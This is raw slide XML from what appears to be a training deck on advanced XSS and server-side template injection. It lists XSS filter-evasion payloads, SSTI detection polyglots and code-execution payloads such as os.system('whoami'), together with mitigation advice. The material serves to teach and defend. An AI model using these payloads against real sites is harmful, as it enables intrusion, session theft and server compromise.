            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Use event handlers over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> tags (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src/onerror=alert(‘xss’)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div onmouseover="alert(1)"&gt;test&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Encoding forbidden words in hexadecimal with leading 0s (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img onerror=a&amp;#x006c;ert(1) src=a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Use same source or default source payloads (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src=# onerror="alert('xxs')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src=“/path/to/malicious”&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Add junk after tag name or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>replacing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> spaces before attributes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script/anyjunk&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img/anyjunk/onerror=alert(1) src=a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Add tabs and spaces (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&amp;#9&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>), wacky casing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ScRipT&gt;alert(1)&lt;/sCriPt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>) and null bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%00script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>) all over the place! You only have to get lucky once...</a:t>
            </a:r>
            <a:endParaRPr sz="11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1500"/>
              <a:t>Leveraging XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Stealing Cookies</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Redirecting User</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Performing actions on behalf of authenticated users</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Enumerating a Site</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS occurs when you cannot see the output of your injection</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>For example, submitting a ticket to an admin panel that is later rendered by an admin</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS payloads must be able to identify where they were triggered, and often involve posting data to a custom server</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p2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Advanced XSS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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440100" y="95700"/>
            <a:ext cx="82638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Server-Side Template Injection (SSTI)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="386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500"/>
              <a:t>The Vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Templating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>languages, such as Joomla and Twig, use templates to dynamically generate web pages by inserting data into HTML code</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>When untrusted data is directly concatenated (rather than passed as a parameter) bad things can happen</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>We can use inbuilt templating language methods to extract data and execute code on the server...</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Example exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Template includes some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t> that is directly concatenated with other elements</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Template Engine unsafely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>renders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>the page on the server side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>render(“&lt;h1&gt;Title: {{” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ “}}&lt;/h1&gt;”)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Our malicious payload is directly executed rather than being interpreted as data</a:t>
            </a:r>
            <a:endParaRPr sz="15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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440100" y="95700"/>
            <a:ext cx="82638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Server-Side Template Injection (SSTI)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="396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100"/>
              <a:t>Steps to Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify the Injection Point</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Fuzz for errors: Inject the polyglot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${{&lt;%[%'"}}%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, look for errors in the response</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Make sure it’s SSTI, not XSS: try mathematical operations like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7+7}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>as the payload</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Try and identify how your code is being injected: Is it concatenated between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{ }} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>tags? Do you need to add them?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Identify the Templating Language: try a sequence of payload syntaxes like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${7*7}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%= 7/0 %&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>More details are here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identify</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Exploit! Payload syntax will depend on your language</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Extract variables like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{data.username}}</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Execute code with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%= system("whoami") %&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{% import os %}{{os.system('whoami')}}</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigating the Exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Create a template to render the user data, rather than concatenating it!</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Pass user data as a parameter to a render call: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>render(title_template, title=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Then handle it as raw data inside the template: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;h1&gt;Title: {{user_data}}&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>We still control the parameter, but it’s no longer being treated as code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Note: syntax will vary per templating language</a:t>
            </a:r>
            <a:endParaRPr sz="11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Doctor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Demo!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="Google Shape;142;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1328438" y="852600"/>
            <a:ext cx="6487124" cy="41103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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
